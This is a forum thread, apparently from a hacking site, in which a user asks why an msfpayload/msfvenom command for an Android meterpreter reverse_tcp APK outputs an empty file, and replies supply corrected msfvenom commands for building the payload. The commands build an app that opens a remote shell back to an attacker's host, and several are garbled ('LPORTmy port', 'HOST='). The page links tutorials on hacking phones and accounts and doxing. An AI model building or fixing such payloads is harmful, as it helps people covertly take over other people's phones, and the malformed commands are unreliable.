Hi guys first thx to all who help me alot i have a simple problem with my msfvenom when i create my payload
msfpayload android/meterpreter/reverse_tcp LHOST=my ip LPORTmy port R > /root/name.apk
the seize of payload after create is 0 buyte
can any one eplain to me why and how to fix this problem btw i use backbox os
Forum Thread: [UNSOLVED] Msfvenom Android Payload Problem
- Hot
- Active
-
Forum Thread: Removing Pay-as-You-Go Meter on Loan Phones. 1 Replies
1 wk ago -
Forum Thread: Install Metasploit Framework in Termux No Root Needed M-Wiz Tool 2 Replies
1 wk ago -
Forum Thread: Hydra Syntax Issue Stops After 16 Attempts 3 Replies
2 wks ago -
Forum Thread: How to Track Who Is Sms Bombing Me . 3 Replies
2 wks ago -
Forum Thread: moab5.Sh Error While Running Metasploit 17 Replies
1 mo ago -
Forum Thread: Execute Reverse PHP Shell with Metasploit 1 Replies
2 mo ago -
Forum Thread: Hack and Track People's Device Constantly Using TRAPE 35 Replies
3 mo ago -
Forum Thread: When My Kali Linux Finishes Installing (It Is Ready to Boot), and When I Try to Boot It All I Get Is a Black Screen. 8 Replies
4 mo ago -
Forum Thread: HACK ANDROID with KALI USING PORT FORWARDING(portmap.io) 12 Replies
5 mo ago -
Forum Thread: Hack Instagram Account Using BruteForce 208 Replies
5 mo ago -
Forum Thread: Metasploit reverse_tcp Handler Problem 47 Replies
7 mo ago -
Forum Thread: How to Train to Be an IT Security Professional (Ethical Hacker) 22 Replies
7 mo ago -
Metasploit Error: Handler Failed to Bind 41 Replies
7 mo ago -
Forum Thread: How to Hack Android Phone Using Same Wifi 21 Replies
8 mo ago -
How to: HACK Android Device with TermuX on Android | Part #1 - Over the Internet [Ultimate Guide] 177 Replies
8 mo ago -
How to: Crack Instagram Passwords Using Instainsane 36 Replies
8 mo ago -
Forum Thread: How to Hack an Android Device Remotely, to Gain Acces to Gmail, Facebook, Twitter and More 5 Replies
8 mo ago -
Forum Thread: How Many Hackers Have Played Watch_Dogs Game Before? 13 Replies
8 mo ago -
Forum Thread: How to Hack an Android Device with Only a Ip Adress 55 Replies
9 mo ago -
How to: Sign the APK File with Embedded Payload (The Ultimate Guide) 10 Replies
9 mo ago
-
How To: Dox Anyone
-
How To: Make Your Own Bad USB
-
How To: Find Vulnerable Webcams Across the Globe Using Shodan
-
How To: Set Up a Wi-Fi Spy Camera with an ESP32-CAM
-
How To: Use Burp & FoxyProxy to Easily Switch Between Proxy Settings
-
How To: Gain SSH Access to Servers by Brute-Forcing Credentials
-
How To: Brute-Force FTP Credentials & Get Server Access
-
How To: Run Kali Linux as a Windows Subsystem
-
How To: Enumerate MySQL Databases with Metasploit
-
How To: Find Identifying Information from a Phone Number Using OSINT Tools
-
How To: Check if Your Wireless Network Adapter Supports Monitor Mode & Packet Injection
-
How To: Exploit EternalBlue on Windows Server with Metasploit
-
How to Hack Wi-Fi: Stealing Wi-Fi Passwords with an Evil Twin Attack
-
How To: Exploit Shellshock on a Web Server Using Metasploit
-
How To: Crack Password-Protected Microsoft Office Files, Including Word Docs & Excel Spreadsheets
-
How To: Use Kismet to Watch Wi-Fi User Activity Through Walls
-
How To: Find Passwords in Exposed Log Files with Google Dorks
-
How to Hack Wi-Fi: Cracking WPA2-PSK Passwords Using Aircrack-Ng
-
How To: Spy on Traffic from a Smartphone with Wireshark
-
How To: Use MDK3 for Advanced Wi-Fi Jamming
4 Responses
Intead of msfpayload you should use:
msfvenom -p android/meterpreter/reversetcp LHOST=yourip LPORT= your_port R > /root/name.apk
And it doesnt matter what os you are using. Msf is same everywhere :) good luck
yeah thx it's work fine but when i install it in my phone there's a problem look at this
https://null-byte.wonderhowto.com/forum/decrypt-android-payload-0175188/
i use this but same the seize is 0 byte of the payload
msfvenom -p android/meterpreter/reverse_tcp LHOST=my ip LPORTmy port R > /root/name.apk
you have to update your metasploit to last version then run thin
msfvenom -p android/meterpreter/reverse_http HOST=my ip LPORTmy port 0 /root/name.apk
Share Your Thoughts